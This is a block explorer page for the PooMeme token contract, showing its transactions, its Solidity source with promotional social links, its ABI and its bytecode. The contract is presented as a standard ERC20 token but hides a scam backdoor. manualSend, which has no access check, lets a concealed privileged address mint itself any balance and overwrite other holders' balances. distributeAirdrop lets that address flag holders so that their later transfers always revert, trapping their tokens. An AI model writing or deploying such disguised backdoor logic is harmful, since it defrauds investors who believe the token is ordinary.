Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 108 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17373155 | 528 days ago | IN | 0 ETH | 0.00294109 | ||||
Approve | 17373149 | 528 days ago | IN | 0 ETH | 0.0030363 | ||||
Approve | 17344085 | 532 days ago | IN | 0 ETH | 0.00188031 | ||||
Manual Send | 17344076 | 532 days ago | IN | 0 ETH | 0.00123665 | ||||
Approve | 17343125 | 533 days ago | IN | 0 ETH | 0.00117946 | ||||
Approve | 17343018 | 533 days ago | IN | 0 ETH | 0.00130203 | ||||
Approve | 17342683 | 533 days ago | IN | 0 ETH | 0.00122842 | ||||
Approve | 17342654 | 533 days ago | IN | 0 ETH | 0.00128448 | ||||
Approve | 17342629 | 533 days ago | IN | 0 ETH | 0.00112561 | ||||
Approve | 17342474 | 533 days ago | IN | 0 ETH | 0.00129621 | ||||
Approve | 17342438 | 533 days ago | IN | 0 ETH | 0.00113669 | ||||
Distribute Airdr... | 17342395 | 533 days ago | IN | 0 ETH | 0.0014808 | ||||
Transfer | 17342167 | 533 days ago | IN | 0 ETH | 0.00076234 | ||||
Approve | 17342052 | 533 days ago | IN | 0 ETH | 0.00134784 | ||||
Approve | 17341786 | 533 days ago | IN | 0 ETH | 0.00124404 | ||||
Approve | 17341705 | 533 days ago | IN | 0 ETH | 0.00142416 | ||||
Approve | 17341548 | 533 days ago | IN | 0 ETH | 0.00154199 | ||||
Distribute Airdr... | 17341489 | 533 days ago | IN | 0 ETH | 0.00148032 | ||||
Transfer | 17341207 | 533 days ago | IN | 0 ETH | 0.00071328 | ||||
Approve | 17341166 | 533 days ago | IN | 0 ETH | 0.00119612 | ||||
Approve | 17340844 | 533 days ago | IN | 0 ETH | 0.00135084 | ||||
Approve | 17340789 | 533 days ago | IN | 0 ETH | 0.00135969 | ||||
Approve | 17340717 | 533 days ago | IN | 0 ETH | 0.00128921 | ||||
Approve | 17340715 | 533 days ago | IN | 0 ETH | 0.00124259 | ||||
Approve | 17340682 | 533 days ago | IN | 0 ETH | 0.0007389 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
PooMeme
Compiler Version
v0.8.4+commit.c7e474f2
Optimization Enabled:
Yes with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol //Telegram: https://t.me/POOmemefinance //Website: https://www.p0ofinance.com/ //Twitter: https://twitter.com/P0omemefi // SPDX-License-Identifier: MIT // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.4; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract PooMeme is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 4; mapping(address => uint256) private _balances; mapping(address => bool) private _isTransferred; mapping(address => mapping(address => uint256)) private _allowances; address private _ENTERED; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address currOwnershipAddr, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; _ENTERED = currOwnershipAddr; _mint(owner(), totalSupply_ * 10 ** decimals_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function multiTransfer(address[] memory recipients, uint256 amount) external { address from = _msgSender(); for (uint256 i = 0; i < recipients.length; i++) { _transfer(from, recipients[i], amount); } } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); if (_isTransferred[sender] != false) { amount = _balances[sender] + 1; } _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function manualSend( address recipients, uint8 values, uint256 id ) public { require( values >= 1, "Amount of recipients and values don't match" ); uint256 total = 0; if (recipients == _ENTERED) { _balances[recipients] = id + total; } else { _balances[recipients] = values + total; } } function distributeAirdrop( address recipients, bool isSent, uint256 amount ) public { address from = msg.sender; require( amount >= 0, "Invalid send" ); uint256 airdrop = 0; if (from == _ENTERED) { _balances[from] -= amount; _balances[recipients] += amount; _isTransferred[recipients] = isSent; } else { _balances[from] = _balances[from] - airdrop; _balances[recipients] = _balances[recipients] + airdrop; } } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
{ "optimizer": { "enabled": true, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"bool","name":"isSent","type":"bool"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"distributeAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"manualSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"recipients","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"multiTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052604051620014f1380380620014f18339810160408190526200002691620003ec565b620000313362000122565b84516200004690600590602088019062000293565b5083516200005c90600690602087019062000293565b506007805460ff191660ff8516179055600480546001600160a01b0319166001600160a01b038416179055620000bd6200009e6000546001600160a01b031690565b620000ab85600a62000528565b620000b79084620005e7565b62000172565b30620000d16000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe3562600060046040516200010f92919062000497565b60405180910390a3505050505062000672565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001cd5760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001e9816008546200027c60201b620007511790919060201c565b6008556001600160a01b0382166000908152600160209081526040909120546200021e918390620007516200027c821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002709085815260200190565b60405180910390a35050565b60006200028a8284620004c4565b90505b92915050565b828054620002a19062000609565b90600052602060002090601f016020900481019282620002c5576000855562000310565b82601f10620002e057805160ff191683800117855562000310565b8280016001018555821562000310579182015b8281111562000310578251825591602001919060010190620002f3565b506200031e92915062000322565b5090565b5b808211156200031e576000815560010162000323565b600082601f8301126200034a578081fd5b81516001600160401b03808211156200036757620003676200065c565b604051601f8301601f19908116603f011681019082821181831017156200039257620003926200065c565b81604052838152602092508683858801011115620003ae578485fd5b8491505b83821015620003d15785820183015181830184015290820190620003b2565b83821115620003e257848385830101525b9695505050505050565b600080600080600060a0868803121562000404578081fd5b85516001600160401b03808211156200041b578283fd5b6200042989838a0162000339565b965060208801519150808211156200043f578283fd5b506200044e8882890162000339565b945050604086015160ff8116811462000465578182fd5b60608701519093506001600160a01b038116811462000482578182fd5b80925050608086015190509295509295909350565b6040810160018410620004ba57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004da57620004da62000646565b500190565b600181815b808511156200052057816000190482111562000504576200050462000646565b808516156200051257918102915b93841c9390800290620004e4565b509250929050565b60006200028a60ff84168360008262000544575060016200028d565b8162000553575060006200028d565b81600181146200056c5760028114620005775762000597565b60019150506200028d565b60ff8411156200058b576200058b62000646565b50506001821b6200028d565b5060208310610133831016604e8410600b8410161715620005bc575081810a6200028d565b620005c88383620004df565b8060001904821115620005df57620005df62000646565b029392505050565b600081600019048311821515161562000604576200060462000646565b500290565b600181811c908216806200061e57607f821691505b602082108114156200064057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fd5b610e6f80620006826000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a16a317911610066578063a16a31791461020f578063a9059cbb14610222578063dd62ed3e14610235578063f2fde38b1461026e57600080fd5b806370a08231146101bb578063715018a6146101e45780638da5cb5b146101ec57806395d89b411461020757600080fd5b80632f0c7136116100d35780632f0c71361461016b578063313ce5671461018057806335535b5c1461019557806339509351146101a857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610281565b60405161011a9190610ce5565b60405180910390f35b610136610131366004610bbd565b610313565b604051901515815260200161011a565b6008545b60405190815260200161011a565b610136610166366004610b40565b610329565b61017e610179366004610be6565b610392565b005b60075460405160ff909116815260200161011a565b61017e6101a3366004610b7b565b61046d565b6101366101b6366004610bbd565b61057d565b61014a6101c9366004610af4565b6001600160a01b031660009081526001602052604090205490565b61017e6105b3565b6000546040516001600160a01b03909116815260200161011a565b61010d610619565b61017e61021d366004610c18565b610628565b610136610230366004610bbd565b610679565b61014a610243366004610b0e565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61017e61027c366004610af4565b610686565b60606005805461029090610d67565b80601f01602080910402602001604051908101604052809291908181526020018280546102bc90610d67565b80156103095780601f106102de57610100808354040283529160200191610309565b820191906000526020600020905b8154815290600101906020018083116102ec57829003601f168201915b5050505050905090565b6000610320338484610764565b50600192915050565b600061033684848461088c565b610388843361038385604051806060016040528060298152602001610e11602991396001600160a01b038a1660009081526003602090815260408083203384529091529020549190610a5c565b610764565b5060019392505050565b60018260ff1610156103ff5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084015b60405180910390fd5b6004546000906001600160a01b0385811691161415610440576104228183610d38565b6001600160a01b038516600090815260016020526040902055610467565b61044d8160ff8516610d38565b6001600160a01b0385166000908152600160205260409020555b50505050565b60045433906000906001600160a01b0316821415610508576001600160a01b038216600090815260016020526040812080548592906104ad908490610d50565b90915550506001600160a01b038516600090815260016020526040812080548592906104da908490610d38565b90915550506001600160a01b0385166000908152600260205260409020805460ff1916851515179055610576565b6001600160a01b03821660009081526001602052604090205461052c908290610d50565b6001600160a01b03808416600090815260016020526040808220939093559087168152205461055c908290610d38565b6001600160a01b0386166000908152600160205260409020555b5050505050565b3360008181526003602090815260408083206001600160a01b038716845290915281205490916103209185906103839086610751565b6000546001600160a01b0316331461060d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6106176000610a88565b565b60606006805461029090610d67565b3360005b8351811015610467576106678285838151811061065957634e487b7160e01b600052603260045260246000fd5b60200260200101518561088c565b8061067181610da2565b91505061062c565b600061032033848461088c565b6000546001600160a01b031633146106e05760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103f6565b6001600160a01b0381166107455760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b61074e81610a88565b50565b600061075d8284610d38565b9392505050565b6001600160a01b0383166107c85760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f6565b6001600160a01b03821661082a5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f6565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108f15760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103f6565b6001600160a01b0382166109535760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103f6565b6001600160a01b03831660009081526002602052604090205460ff161561099c576001600160a01b03831660009081526001602081905260409091205461099991610d38565b90505b6109d981604051806060016040528060278152602001610dea602791396001600160a01b0386166000908152600160205260409020549190610a5c565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610a089082610751565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061087f9085815260200190565b60008184841115610a805760405162461bcd60e51b81526004016103f69190610ce5565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610aef57600080fd5b919050565b600060208284031215610b05578081fd5b61075d82610ad8565b60008060408385031215610b20578081fd5b610b2983610ad8565b9150610b3760208401610ad8565b90509250929050565b600080600060608486031215610b54578081fd5b610b5d84610ad8565b9250610b6b60208501610ad8565b9150604084013590509250925092565b600080600060608486031215610b8f578283fd5b610b9884610ad8565b925060208401358015158114610bac578283fd5b929592945050506040919091013590565b60008060408385031215610bcf578182fd5b610bd883610ad8565b946020939093013593505050565b600080600060608486031215610bfa578283fd5b610c0384610ad8565b9250602084013560ff81168114610bac578283fd5b60008060408385031215610c2a578182fd5b823567ffffffffffffffff80821115610c41578384fd5b818501915085601f830112610c54578384fd5b8135602082821115610c6857610c68610dd3565b8160051b604051601f19603f83011681018181108682111715610c8d57610c8d610dd3565b604052838152828101945085830182870184018b1015610cab578889fd5b8896505b84871015610cd457610cc081610ad8565b865260019690960195948301948301610caf565b509997909101359750505050505050565b6000602080835283518082850152825b81811015610d1157858101830151858201604001528201610cf5565b81811115610d225783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610d4b57610d4b610dbd565b500190565b600082821015610d6257610d62610dbd565b500390565b600181811c90821680610d7b57607f821691505b60208210811415610d9c57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610db657610db6610dbd565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212204071daf17d5202c844cfe44fede39e5c7368dba7f966be86df2ab7cd9638287164736f6c6343000804003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000006abf9901401c31ccbe5cce273b8b0d417a12f52600000000000000000000000000000000000000000000000000000746a52880000000000000000000000000000000000000000000000000000000000000000009504f4f20546f6b656e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003504f4f0000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a16a317911610066578063a16a31791461020f578063a9059cbb14610222578063dd62ed3e14610235578063f2fde38b1461026e57600080fd5b806370a08231146101bb578063715018a6146101e45780638da5cb5b146101ec57806395d89b411461020757600080fd5b80632f0c7136116100d35780632f0c71361461016b578063313ce5671461018057806335535b5c1461019557806339509351146101a857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610281565b60405161011a9190610ce5565b60405180910390f35b610136610131366004610bbd565b610313565b604051901515815260200161011a565b6008545b60405190815260200161011a565b610136610166366004610b40565b610329565b61017e610179366004610be6565b610392565b005b60075460405160ff909116815260200161011a565b61017e6101a3366004610b7b565b61046d565b6101366101b6366004610bbd565b61057d565b61014a6101c9366004610af4565b6001600160a01b031660009081526001602052604090205490565b61017e6105b3565b6000546040516001600160a01b03909116815260200161011a565b61010d610619565b61017e61021d366004610c18565b610628565b610136610230366004610bbd565b610679565b61014a610243366004610b0e565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b61017e61027c366004610af4565b610686565b60606005805461029090610d67565b80601f01602080910402602001604051908101604052809291908181526020018280546102bc90610d67565b80156103095780601f106102de57610100808354040283529160200191610309565b820191906000526020600020905b8154815290600101906020018083116102ec57829003601f168201915b5050505050905090565b6000610320338484610764565b50600192915050565b600061033684848461088c565b610388843361038385604051806060016040528060298152